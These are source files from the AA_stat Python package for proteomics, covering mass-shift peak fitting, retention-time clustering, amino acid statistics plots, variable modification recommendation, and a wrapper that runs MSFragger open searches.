if same_residue(row['top isoform']): # localization and enabled variable modification on the same residue
# this should count towards sum of these shifts, not the localized one
pos = row['loc_position'][0]
mods = utils.get_var_mods(row, params_dict)
utils.internal('%s: extracting %d from %s', row['top isoform'], pos, mods)
if pos in mods:
vm = mods[pos]
elif pos == 1:
vm = mods[0]
elif pos == len(peptide):
vm = mods[pos + 1]
else:
raise KeyError()
aa = peptide[pos - 1]
if mods_and_counts[aa].get(ms, 0) > 0:
utils.internal('Reducing count of %s at %s', aa, ms)
mods_and_counts[aa][ms] -= 1
if pos == 1 and mods_and_counts['N-term'].get(ms, 0) > 0:
mods_and_counts['N-term'][ms] -= 1
utils.internal('Reducing count of N-term at %s', ms)
if pos == len(peptide) and mods_and_counts['C-term'].get(ms, 0) > 0:
utils.internal('Reducing count of C-term at %s', ms)
mods_and_counts['C-term'][ms] -= 1
sum_ms = utils.find_mass_shift(vm + shift, data_dict, params_dict['prec_acc'])
if sum_ms:
mods_and_counts[aa][sum_ms] = mods_and_counts[aa].get(sum_ms, 0) + 1
utils.internal('Increasing count of %s at %s', aa, sum_ms)
if pos == 1:
utils.internal('Increasing count of N-term at %s', sum_ms)
mods_and_counts['N-term'][sum_ms] = mods_and_counts['N-term'].get(sum_ms, 0) + 1
if pos == len(peptide):
utils.internal('Increasing count of C-term at %s', sum_ms)
mods_and_counts['C-term'][sum_ms] = mods_and_counts['C-term'].get(sum_ms, 0) + 1
def determine_var_mods(aastat_result, aastat_df, locmod_df, data_dict, params_dict, recommended_fix_mods=None):
if locmod_df is None:
logger.info('Cannot recommend variable modifications without localization.')
return {}
var_mods = []
recommended = set()
multiple = params_dict['multiple_mods']
if multiple:
logger.info('Recommending multiple modifications on same residue.')
else:
logger.info('Recommending one modification per residue.')
isotope_rec = recommend_isotope_error(aastat_df, locmod_df, params_dict)
logger.info('Recommended isotope mass error: %d.', isotope_rec)
if isotope_rec:
var_mods.append(('isotope error', isotope_rec))
reference = aastat_df.loc[aastat_df['is reference']].index[0]
mods_and_counts = defaultdict(dict) # dict of AA: shift label: count
for shift in data_dict:
if shift == reference:
continue
l10n = locmod_df.at[shift, 'localization']
for k, count in l10n.items():
if k == 'non-localized':
continue
aa, locshift = utils.parse_l10n_site(k)
if locshift == shift:
mods_and_counts[aa][shift] = count
logger.debug('Without isotopes, localization counts are:')
for k, d in mods_and_counts.items():
logger.debug('%s: %s', k, d)
if isotope_rec:
for aa, dcounts in mods_and_counts.items():
for shift, count in list(dcounts.items()):
i = 0
while i < isotope_rec:
label = utils.get_isotope_shift(shift, locmod_df)
if label:
dcounts[shift] = dcounts.get(shift, 0) + mods_and_counts[aa].get(label, 0)
# dcounts.pop(label, None)
i += 1
else:
break
i = 0
shift = reference
while i < isotope_rec:
label = utils.get_isotope_shift(shift, locmod_df)
if label:
logger.debug('Removing all counts for isotope shift %s', label)
for aa, dcounts in mods_and_counts.items():
dcounts[label] = 0
i += 1
else:
break
logger.debug('With isotopes, localization counts are:')
for k, d in mods_and_counts.items():
logger.debug('%s: %s', k, d)
if recommended_fix_mods:
logger.debug('Subtracting counts for fixed mods.')
for aa, shift in recommended_fix_mods.items():
recalculate_with_isotopes(aa, shift, isotope_rec, mods_and_counts, data_dict, locmod_df)
if params_dict['var_mod']:
if not multiple:
logger.info('Multiple variable modifications are disabled, not recommending {} for variable modifications.'.format(
utils.format_list(set(x[0] for x in params_dict['var_mod']))))
for aa, shift in params_dict['var_mod']:
logger.debug('Removing all counts for %s.', aa)
for sh in mods_and_counts[aa]:
mods_and_counts[aa][sh] = 0
logger.debug('Subtracting counts for variable mods.')
recalculate_varmods(data_dict, mods_and_counts, params_dict)
for i in range(params_dict['variable_mods']):
logger.debug('Choosing variable modification %d. Counts are:', i + 1)
for k, d in mods_and_counts.items():
logger.debug('%s: %s', k, d)
aa_shifts = {aa: max(dcounts, key=dcounts.get) for aa, dcounts in mods_and_counts.items() if dcounts}
if mods_and_counts:
aa_counts = {aa: mods_and_counts[aa][shift] for aa, shift in aa_shifts.items()}
logger.debug('Best localization counts: %s', aa_shifts)
logger.debug('Values: %s', aa_counts)
if aa_shifts:
top_aa = max(aa_shifts, key=aa_counts.get)
top_shift = aa_shifts[top_aa]
top_count = aa_counts[top_aa]
if top_count < params_dict['min_loc_count']:
logger.debug('Localization count too small (%d), stopping.', top_count)
break
recommended.add(top_aa)
var_mods.append((top_aa, top_shift))
logger.debug('Chose %s @ %s.', top_shift, top_aa)
recalculate_with_isotopes(top_aa, top_shift, isotope_rec, mods_and_counts, data_dict, locmod_df)
if not multiple:
logger.debug('Removing all counts for %s.', top_aa)
for sh in mods_and_counts[top_aa]:
mods_and_counts[top_aa][sh] = 0
return var_mods | AA-stat | /AA_stat-2.5.5-py3-none-any.whl/AA_stat/recommendations.py | recommendations.py |
import matplotlib
matplotlib.use('Agg')
import pylab as plt
import math
import os
import logging
import warnings
import multiprocessing as mp
import numpy as np
from sklearn import cluster
from scipy.optimize import curve_fit
from scipy.signal import argrelextrema, savgol_filter
import seaborn as sb
from . import utils
logger = logging.getLogger(__name__)
logging.getLogger('matplotlib.font_manager').disabled = True
logging.getLogger('matplotlib.category').disabled = True
cc = ["#FF6600",
"#FFCC00",
"#88AA00",
"#006688",
"#5FBCD3",
"#7137C8",
]
sb.set_style('white')
colors = sb.color_palette(palette=cc)
def _gauss_fit_slice(to_fit, unit, filename, title, params_dict, mpl_back):
logger.debug('Fitting zero-shift peptides...')
f = plt.figure()
hist_0 = np.histogram(to_fit, bins=int(params_dict['zero_window'] / params_dict['bin_width']))
hist_y = hist_0[0]
hist_x = 0.5 * (hist_0[1][:-1] + hist_0[1][1:])
plt.plot(hist_x, hist_y, 'b+')
popt, perr = gauss_fitting(max(hist_y), hist_x, hist_y)
plt.scatter(hist_x, gauss(hist_x, *popt), label='Gaussian fit')
plt.xlabel('massdiff, ' + unit)
plt.title(title)
mpl_back.savefig(f)
plt.close()
logger.info('Systematic shift is %.4f %s for file %s [ %s ]', popt[1], unit, filename, title)
return popt
def clusters(df, to_fit, unit, filename, params_dict, mpl_back):
if to_fit.shape[0] < 500:
logger.warning('Not enough data for cluster analysis. Need at least 500 peptides near zero, found %d.', to_fit.shape[0])
return None
X = np.empty((to_fit.shape[0], 2))
X[:, 0] = to_fit
X[:, 1] = df.loc[to_fit.index, params_dict['rt_column']]
logger.debug('Clustering a %s array.', X.shape)
logger.debug('Initial dimensions: %s to %s', X.min(axis=0), X.max(axis=0))
logger.debug('Converting to square...')
span_0 = X[:, 0].max() - X[:, 0].min()
span_1 = X[:, 1].max() - X[:, 1].min()
ratio = span_1 / span_0
X[:, 0] *= ratio
logger.debug('Transformed dimensions: %s to %s', X.min(axis=0), X.max(axis=0))
eps = span_1 * params_dict['zero_window'] * params_dict['eps_adjust']
logger.debug('Using eps=%f', eps)
clustering = cluster.DBSCAN(eps=eps, min_samples=params_dict['min_samples']).fit(X)
f = plt.figure()
sc = plt.scatter(to_fit, X[:, 1], c=clustering.labels_)
plt.legend(*sc.legend_elements(), title='Clusters')
plt.xlabel(unit)
plt.ylabel(params_dict['rt_column'])
mpl_back.savefig(f)
plt.close()
f = plt.figure()
for c in np.unique(clustering.labels_):
plt.hist(X[clustering.labels_ == c, 1], label=c, alpha=0.5)
plt.xlabel(params_dict['rt_column'])
plt.legend()
mpl_back.savefig(f)
plt.close()
return clustering
def cluster_time_span(clustering, label, df, to_fit, params_dict):
times = df.loc[to_fit.index].loc[clustering.labels_ == label, params_dict['rt_column']]
return times.min(), times.max()
def span_percentage(span, df, to_fit, params_dict):
start, end = span
all_rt = df[params_dict['rt_column']]
return (end - start) / (all_rt.max() - all_rt.min())
def cluster_time_percentage(clustering, label, df, to_fit, params_dict):
span = cluster_time_span(clustering, label, df, to_fit, params_dict)
return span_percentage(span, df, to_fit, params_dict)
def filter_clusters(clustering, df, to_fit, params_dict):
nclusters = clustering.labels_.max() + 1
logger.debug('Found %d clusters, %d labels assigned.', nclusters, clustering.labels_.size)
if not nclusters:
return []
out = []
clustered_peps = 0
for i in np.unique(clustering.labels_):
if i == -1:
continue
npep = (clustering.labels_ == i).sum()
if npep < params_dict['min_peptides_for_mass_calibration']:
logger.debug('Cluster %s is too small for calibration (%d), discarding.', i, npep)
continue
span_pct = cluster_time_percentage(clustering, i, df, to_fit, params_dict)
if span_pct < params_dict['cluster_span_min']:
logger.debug('Cluster %s spans %.2f%% of the run (too small, thresh = %.2f%%). Discarding.',
i, span_pct * 100, params_dict['cluster_span_min'] * 100)
continue
out.append(i)
clustered_peps += npep
logger.debug('Pre-selected clusters: %s', out)
logger.debug('%.2f%% peptides in clusters, threshold is %.2f%%.',
clustered_peps / df.shape[0] * 100, params_dict['clustered_pct_min'] * 100)
if clustered_peps / df.shape[0] < params_dict['clustered_pct_min']:
logger.debug('Too few peptides in clusters, discarding clusters altogether.')
return []
return out
def get_fittable_series(df, params_dict, mask=None):
window = params_dict['zero_window']
shifts = params_dict['mass_shifts_column']
loc = df[shifts].abs() < window
# logger.debug('loc size for zero shift: %s', loc.size)
if params_dict['calibration'] == 'gauss':
to_fit = df.loc[loc, shifts]
unit = 'Da'
elif params_dict['calibration'] == 'gauss_relative':
to_fit = df.loc[loc, shifts] * 1e6 / df.loc[loc, params_dict['calculated_mass_column']]
unit = 'ppm'
elif params_dict['calibration'] == 'gauss_frequency':
freq_measured = 1e6 / np.sqrt(utils.measured_mz_series(df, params_dict))
freq_calculated = 1e6 / np.sqrt(utils.calculated_mz_series(df, params_dict))
to_fit = (freq_measured - freq_calculated).loc[loc]
unit = 'freq. units'
if mask is not None:
to_fit = to_fit.loc[mask]
logger.debug('Returning a %s fittable series for a %s dataframe with a %s mask.', to_fit.shape, df.shape,
mask.shape if mask is not None else None)
return to_fit, unit
def get_cluster_masks(filtered_clusters, clustering, df, to_fit, params_dict):
all_rt = df[params_dict['rt_column']]
time_spans = {i: cluster_time_span(clustering, i, df, to_fit, params_dict) for i in filtered_clusters}
sorted_clusters = sorted(filtered_clusters, key=time_spans.get) # sorts by span start
i = 0
prev = all_rt.min()
masks = {}
while i < len(sorted_clusters):
cur_end = time_spans[sorted_clusters[i]][1]
if i == len(sorted_clusters) - 1:
next_point = all_rt.max() + 1
else:
next_start = time_spans[sorted_clusters[i + 1]][0]
next_point = (cur_end + next_start) / 2
logger.debug('Time span %.1f - %.1f assigned to cluster %s', prev, next_point, sorted_clusters[i])
masks[sorted_clusters[i]] = (all_rt >= prev) & (all_rt < next_point)
i += 1
prev = next_point
assigned_masks = [masks[c] for c in filtered_clusters]
return assigned_masks
def smooth(y, window_size=15, power=5):
"""
Smoothes function.
Paramenters
-----------
y : array-like
function to smooth.
window_size : int
Smothing window.
power : int
Power of smothing function.
Returns
-------
Smoothed function
"""
y_smooth = savgol_filter(y, window_size, power)
return y_smooth
def gauss(x, a, x0, sigma):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
return a / sigma / np.sqrt(2 * np.pi) * np.exp(-(x - x0) * (x - x0) / (2 * sigma ** 2))
def gauss_fitting(center_y, x, y):
"""
Fits with Gauss function
`center_y` - starting point for `a` parameter of gauss
`x` numpy array of mass shifts
`y` numpy array of number of psms in this mass shifts
"""
mean = (x * y).sum() / y.sum()
sigma = np.sqrt((y * (x - mean) ** 2).sum() / y.sum())
a = center_y * sigma * np.sqrt(2 * np.pi)
try:
popt, pcov = curve_fit(gauss, x, y, p0=(a, mean, sigma))
perr = np.sqrt(np.diag(pcov))
return popt, perr
except (RuntimeError, TypeError):
return None, None
def fit_worker(args):
return fit_batch_worker(*args)
def fit_batch_worker(out_path, batch_size, xs, ys, half_window, height_error, sigma_error):
shape = int(math.ceil(np.sqrt(batch_size)))
figsize = (shape * 3, shape * 4)
plt.figure(figsize=figsize)
plt.tight_layout()
logger.debug('Created a figure with size %s', figsize)
poptpvar = []
for i in range(batch_size):
center = i * (2 * half_window + 1) + half_window
x = xs[center - half_window: center + half_window + 1]
y = ys[center - half_window: center + half_window + 1]
popt, perr = gauss_fitting(ys[center], x, y)
plt.subplot(shape, shape, i + 1)
if popt is None:
label = 'NO FIT'
else:
if (x[0] <= popt[1] and popt[1] <= x[-1] and perr[0] / popt[0] < height_error
and perr[2] / popt[2] < sigma_error):
label = 'PASSED'
poptpvar.append(np.concatenate([popt, perr]))
plt.vlines(popt[1] - 3 * popt[2], 0, ys[center], label='3sigma interval')
plt.vlines(popt[1] + 3 * popt[2], 0, ys[center])
else:
label = 'FAILED'
plt.plot(x, y, 'b+:', label=label)
if label != 'NO FIT':
plt.scatter(x, gauss(x, *popt), label='Gaussian fit\n $\\sigma$ = {:.4f}'.format(popt[2]))
plt.legend()
plt.title("{0:.3f}".format(xs[center]))
plt.grid(True)
logger.debug('Fit done. Saving %s...', out_path)
plt.savefig(out_path)
plt.close()
return poptpvar
def fit_peaks(data, args, params_dict):
"""
Finds Gauss-like peaks in mass shift histogram.
Parameters
----------
data : DataFRame
A DF with all (non-filtered) results of open search.
args: argsparse
params_dict : dict
Parameters dict.
"""
logger.info('Performing Gaussian fit...')
fit_batch = params_dict['fit batch']
half_window = int(params_dict['window'] / 2) + 1
hist = np.histogram(data.loc[data['is_decoy'] == False, params_dict['mass_shifts_column']], bins=params_dict['bins'])
hist_y = smooth(hist[0], window_size=params_dict['window'], power=5)
hist_x = 0.5 * (hist[1][:-1] + hist[1][1:])
loc_max_candidates_ind = argrelextrema(hist_y, np.greater_equal)[0]
# smoothing and finding local maxima
min_height = 2 * np.median(hist[0][hist[0] > 1])
# minimum bin height expected to be peak approximate noise level as median of all non-negative
loc_max_candidates_ind = loc_max_candidates_ind[hist_y[loc_max_candidates_ind] >= min_height]
if not loc_max_candidates_ind.size:
logger.info('No peaks found for fit.')
return hist, np.array([])
height_error = params_dict['max_deviation_height']
sigma_error = params_dict['max_deviation_sigma']
logger.debug('Candidates for fit: %s', len(loc_max_candidates_ind))
nproc = int(math.ceil(len(loc_max_candidates_ind) / fit_batch))
maxproc = params_dict['processes']
if maxproc > 0:
nproc = min(nproc, maxproc)
if nproc > 1:
arguments = []
logger.debug('Splitting the fit into %s batches...', nproc)
n = min(nproc, mp.cpu_count())
logger.debug('Creating a pool of %s processes.', n)
pool = mp.Pool(n)
for proc in range(nproc):
xlist = [hist_x[center - half_window: center + half_window + 1]
for center in loc_max_candidates_ind[proc * fit_batch: (proc + 1) * fit_batch]]
xs = np.concatenate(xlist)
ylist = [hist[0][center - half_window: center + half_window + 1]
for center in loc_max_candidates_ind[proc * fit_batch: (proc + 1) * fit_batch]]
ys = np.concatenate(ylist)
out = os.path.join(args.dir, 'gauss_fit_{}.pdf'.format(proc + 1))
arguments.append((out, len(xlist), xs, ys, half_window, height_error, sigma_error))
res = pool.map_async(fit_worker, arguments)
poptpvar_list = res.get()
# logger.debug(poptpvar_list)
pool.close()
pool.join()
logger.debug('Workers done.')
poptpvar = [p for r in poptpvar_list for p in r]
else:
xs = np.concatenate([hist_x[center - half_window: center + half_window + 1]
for center in loc_max_candidates_ind])
ys = np.concatenate([hist[0][center - half_window: center + half_window + 1]
for center in loc_max_candidates_ind])
poptpvar = fit_batch_worker(os.path.join(args.dir, 'gauss_fit.pdf'),
len(loc_max_candidates_ind), xs, ys, half_window, height_error, sigma_error)
logger.debug('Returning from fit_peaks. Array size is %d.', len(poptpvar))
return np.array(poptpvar)
_Mkstyle = matplotlib.markers.MarkerStyle
_marker_styles = [_Mkstyle('o', fillstyle='full'), (_Mkstyle('o', fillstyle='left'), _Mkstyle('o', fillstyle='right')),
(_Mkstyle('o', fillstyle='top'), _Mkstyle('o', fillstyle='bottom')), (_Mkstyle(8), _Mkstyle(9)),
(_Mkstyle('v'), _Mkstyle('^')), (_Mkstyle('|'), _Mkstyle('_')), (_Mkstyle('+'), _Mkstyle('x'))]
def _generate_pair_markers():
'''Produce style & color pairs for localization markers (except the main one).'''
for i in [3, 4, 5, 0, 1, 2]:
for ms in _marker_styles[1:]:
yield colors[i], ms
def _get_max(arr):
values = [x for x in arr if x is not None]
if values:
return max(values)
return 0
def plot_figure(ms_label, ms_counts, left, right, params_dict, save_directory, localizations=None, sumof=None):
"""
Plots amino acid spatistics.
Parameters
----------
ms_label : str
Mass shift in string format.
ms_counts : int
Number of peptides in a mass shift.
left : list
Amino acid statistics data [[values], [errors]]
right : list
Amino acid frequences in peptides
params_dict : dict
Parameters dict.
save_directory: str
Saving directory.
localizations : Counter
Localization counter using ms/ms level.
sumof : List
List of str tuples for constituent mass shifts.
"""
b = 0.1 # shift in bar plots
width = 0.2 # for bar plots
labels = params_dict['labels']
labeltext = ms_label + ' Da mass shift,\n' + str(ms_counts) + ' peptides'
x = np.arange(len(labels))
distributions = left[0]
errors = left[1]
fig, ax_left = plt.subplots()
fig.set_size_inches(params_dict['figsize'])
ax_left.bar(x - b, distributions.loc[labels],
yerr=errors.loc[labels], width=width, color=colors[2], linewidth=0)
ax_left.set_ylabel('Relative AA abundance', color=colors[2])
ax_left.set_xticks(x)
ax_left.set_xticklabels(labels)
ax_left.hlines(1, -1, x[-1] + 1, linestyles='dashed', color=colors[2])
ax_right = ax_left.twinx()
ax_right.bar(x + b, right, width=width, linewidth=0, color=colors[0])
ax_right.set_ylim(0, 125)
ax_right.set_yticks(np.arange(0, 120, 20))
ax_right.set_ylabel('Peptides with AA, %', color=colors[0])
ax_left.spines['left'].set_color(colors[2])
ax_right.spines['left'].set_color(colors[2])
ax_left.spines['right'].set_color(colors[0])
ax_right.spines['right'].set_color(colors[0])
ax_left.tick_params('y', colors=colors[2])
ax_right.tick_params('y', colors=colors[0])
pright = matplotlib.lines.Line2D([], [], marker=None, label=labeltext, alpha=0)
ax_left.set_xlim(-1, x[-1] + 1)
ax_left.set_ylim(0, distributions.loc[labels].max() * 1.4)
logger.debug('Localizations for %s figure: %s', ms_label, localizations)
if localizations:
ax3 = ax_left.twinx()
ax3.spines['right'].set_position(('axes', 1.1))
ax3.set_frame_on(True)
ax3.patch.set_visible(False)
ax3.set_ylabel('Localization count', color=colors[3])
for sp in ax3.spines.values():
sp.set_visible(False)
ax3.spines['right'].set_visible(True)
ax3.spines['right'].set_color(colors[3])
ax3.tick_params('y', colors=colors[3])
# plot simple modifications (not sum) with the first style,
# then parts of sum
values = [localizations.get(key + '_' + ms_label) for key in labels]
maxcount = _get_max(values)
label_prefix = 'Location of '
ax3.scatter(x, values, marker=_marker_styles[0], color=colors[3], label=label_prefix + ms_label)
if isinstance(sumof, list):
for pair, (color, style) in zip(sumof, _generate_pair_markers()):
values_1 = [localizations.get(key + '_' + pair[0]) for key in labels]
maxcount = max(maxcount, _get_max(values_1))
ax3.scatter(x, values_1, marker=style[0], color=color, label=label_prefix + pair[0])
if pair[0] != pair[1]:
values_2 = [localizations.get(key + '_' + pair[1]) for key in labels]
if values_2:
maxcount = max(maxcount, _get_max(values_2))
ax3.scatter(x, values_2, marker=style[1], color=color, label=label_prefix + pair[1])
terms = {key for key in localizations if key[1:6] == '-term'}
# logger.debug('Found terminal localizations: %s', terms)
for t in terms:
label = '{} at {}: {}'.format(*reversed(t.split('_')), localizations[t])
p = ax3.plot([], [], label=label)[0]
p.set_visible(False)
pright.set_label(pright.get_label() + '\nNot localized: {}'.format(localizations.get('non-localized', 0)))
if maxcount:
ax3.legend(loc='upper left', ncol=2)
ax3.set_ylim(0, 1.4 * max(maxcount, 1))
ax_right.legend(handles=[pright], loc='upper right', edgecolor='dimgrey', fancybox=True, handlelength=0)
fig.tight_layout()
fig.savefig(os.path.join(save_directory, ms_label + '.png'), dpi=500)
fig.savefig(os.path.join(save_directory, ms_label + '.svg'))
plt.close()
def summarizing_hist(table, save_directory):
width = 0.8
fig, ax = plt.subplots(figsize=(len(table), 5))
ax.bar(range(len(table)), table.sort_values('mass shift')['# peptides in bin'],
color=colors[2], align='center', width=width)
ax.set_title('Peptides in mass shifts', fontsize=12)
ax.set_xlabel('Mass shift', fontsize=10)
ax.set_ylabel('Number of peptides')
ax.set_xlim((-1, len(table)))
ax.set_xticks(range(len(table)))
ax.set_xticklabels(table.sort_values('mass shift')['mass shift'].apply('{:.2f}'.format))
total = table['# peptides in bin'].sum()
vdist = table['# peptides in bin'].max() * 0.01
max_height = 0
for i, patch in enumerate(ax.patches):
current_height = patch.get_height()
if current_height > max_height:
max_height = current_height
ax.text(patch.get_x() + width / 2, current_height + vdist,
'{:>6.2%}'.format(table.at[table.index[i], '# peptides in bin'] / total),
fontsize=10, color='dimgrey', ha='center')
plt.ylim(0, max_height * 1.2)
plt.tight_layout()
plt.savefig(os.path.join(save_directory, 'summary.png')) # dpi=500
plt.savefig(os.path.join(save_directory, 'summary.svg'))
plt.close() | AA-stat | /AA_stat-2.5.5-py3-none-any.whl/AA_stat/stats.py | stats.py |
import subprocess
import os
import shutil
from . import AA_stat, utils, io
import argparse
import logging
import sys
"""
Created on Sun Jan 26 15:41:40 2020
@author: julia
"""
OS_PARAMS_DEFAULT = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'open_search.params')
logger = logging.getLogger(__name__)
DICT_AA = {
'add_G_glycine' : 'G',
'add_A_alanine' : 'A',
'add_S_serine' : 'S',
'add_P_proline' : 'P',
'add_V_valine' : 'V',
'add_T_threonine' : 'T',
'add_C_cysteine' : 'C',
'add_L_leucine' : 'L',
'add_I_isoleucine' : 'I',
'add_N_asparagine' : 'N',
'add_D_aspartic_acid' : 'D',
'add_Q_glutamine' : 'Q',
'add_K_lysine' : 'K',
'add_E_glutamic_acid' : 'E',
'add_M_methionine' : 'M',
'add_H_histidine' : 'H',
'add_F_phenylalanine' : 'F',
'add_R_arginine' : 'R',
'add_Y_tyrosine' : 'Y',
'add_W_tryptophan' : 'W',
'add_Cterm_peptide' : 'C-term',
'add_Nterm_peptide' : 'N-term',
}
def main():
pars = argparse.ArgumentParser()
pars.add_argument('--params', help='CFG file with parameters. If there is no file, AA_stat uses default one. '
'An example can be found at https://github.com/SimpleNumber/aa_stat', required=False)
pars.add_argument('--MSFragger', help='Path to MSFragger .jar file. '
'If not specified, MSFRAGGER environment variable is used.')
pars.add_argument('--dir', help='Directory to store the results. Default value is current directory.', default='.')
pars.add_argument('-v', '--verbosity', type=int, choices=range(4), default=1, help='Output verbosity.')
input_spectra = pars.add_mutually_exclusive_group(required=True)
input_spectra.add_argument('--mgf', nargs='+', help='MGF files to search.', default=None)
input_spectra.add_argument('--mzml', nargs='+', help='mzML files to search.', default=None)
pars.add_argument('-db', '--fasta', help='FASTA file with decoys for open search. None: with included MSFragger parameters, '
'the database is expected to contain decoys. Default decoy prefix is "rev_".'
' If it differs, do not forget to specify it in AA_stat params file.')
pars.add_argument('--os-params', help='Custom open search parameters.')
pars.add_argument('-x', '--optimize-fixed-mods',
help='Run multiple searches, automatically determine which fixed modifications to apply.',
action='store_true', default=False)
pars.add_argument('-s', '--skip', help='Skip search if pepXML files exist already. If not specified, '
'no steps are skipped. If specified without value, first step may be skipped. '
'Value is number of steps to skip. Only works with "-x".',
nargs='?', default=0, const=1, type=int)
pars.add_argument('-je', '--java-executable', default='java')
pars.add_argument('-ja', '--java-args', default='')
args = pars.parse_args()
levels = [logging.WARNING, logging.INFO, logging.DEBUG, utils.INTERNAL]
logging.basicConfig(format='{levelname:>8}: {asctime} {message}',
datefmt='[%H:%M:%S]', level=levels[args.verbosity], style='{')
if not args.MSFragger:
args.MSFragger = os.environ.get('MSFRAGGER')
if not args.MSFragger:
logger.critical('Please specify --MSFragger or set MSFRAGGER environment variable.')
sys.exit(1)
logger.info("Starting MSFragger and AA_stat pipeline.")
spectra = args.mgf or args.mzml
spectra = [os.path.abspath(i) for i in spectra]
working_dir = args.dir
if args.optimize_fixed_mods:
logger.debug('Skipping up to %d steps.', args.skip)
step = 1
fix_mod_dict = {}
while True:
logger.info('Starting step %d.', step)
fig_data, aastat_table, locmod, data_dict, new_fix_mod_dict, var_mod_dict = run_step_os(
spectra, 'os_step_{}'.format(step), working_dir, args, change_dict=fix_mod_dict, step=step)
if new_fix_mod_dict:
for k, v in new_fix_mod_dict.items():
fix_mod_dict.setdefault(k, 0.)
fix_mod_dict[k] += data_dict[v][0]
step += 1
else:
break
try:
if os.path.isfile(os.path.join(working_dir, 'report.html')):
logger.debug('Removing existing report.html.')
os.remove(os.path.join(working_dir, 'report.html'))
os.symlink(os.path.join('os_step_1', 'report.html'), os.path.join(working_dir, 'report.html'))
except Exception as e:
logger.debug('Can\'t create symlink to report: %s', e)
else:
logger.debug('Symlink created successfully.')
logger.info('Stopping after %d steps.', step)
else:
logger.info('Running one-shot search.')
folder_name = ''
run_step_os(spectra, folder_name, working_dir, args)
def get_pepxml(input_file, d=None):
initial = os.path.splitext(input_file)[0] + '.pepXML'
if d is None:
return initial
sdir, f = os.path.split(initial)
return os.path.join(d, f)
def run_os(java, jargs, spectra, msfragger, save_dir, parameters):
command = [java] + jargs + ['-jar', msfragger, parameters, *spectra]
logger.debug('Running command: %s', ' '.join(command))
retval = subprocess.call(command)
logger.debug('Subprocess returned %s', retval)
if retval:
logger.critical('MSFragger returned non-zero code %s. Exiting.', retval)
sys.exit(retval)
os.makedirs(save_dir, exist_ok=True)
for s in spectra:
pepxml = get_pepxml(s)
if os.path.normpath(os.path.dirname(pepxml)) != os.path.normpath(save_dir):
logger.debug('Moving %s to %s', pepxml, save_dir)
shutil.move(pepxml, get_pepxml(s, save_dir))
else:
logger.debug('No need to move pepXML file.')
def create_os_params(output, original=None, mass_shifts=None, fastafile=None):
original = original or OS_PARAMS_DEFAULT
with open(output, 'w') as new_params, open(original) as default:
for line in default:
key = line.split('=')[0].strip()
if key == 'database_name' and fastafile:
new_params.write('database_name = {}\n'.format(fastafile))
elif mass_shifts and DICT_AA.get(key) in mass_shifts:
aa = DICT_AA[key]
new_params.write(key + ' = ' + str(mass_shifts[aa]) + '\n')
else:
new_params.write(line)
def run_step_os(spectra, folder_name, working_dir, args, change_dict=None, step=None):
dir = os.path.abspath(os.path.join(working_dir, folder_name))
os.makedirs(dir, exist_ok=True)
os_params_path = os.path.abspath(os.path.join(working_dir, folder_name, 'os.params'))
create_os_params(os_params_path, args.os_params, change_dict, args.fasta)
pepxml_names = [get_pepxml(s, dir) for s in spectra]
run = True
if step is not None:
if step <= args.skip:
run = not all(os.path.isfile(f) for f in pepxml_names)
logger.debug('On step %d, need to run search: %s', step, run)
else:
logger.debug('Can\'t skip step %d, running.', step)
if run:
run_os(args.java_executable, args.java_args.split(), spectra, args.MSFragger, dir, os_params_path)
else:
logger.info('Skipping search.')
args.pepxml = pepxml_names
args.csv = None
args.dir = dir
params_dict = io.get_params_dict(args)
return AA_stat.AA_stat(params_dict, args, step=step) | AA-stat | /AA_stat-2.5.5-py3-none-any.whl/AA_stat/aa_search.py | aa_search.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.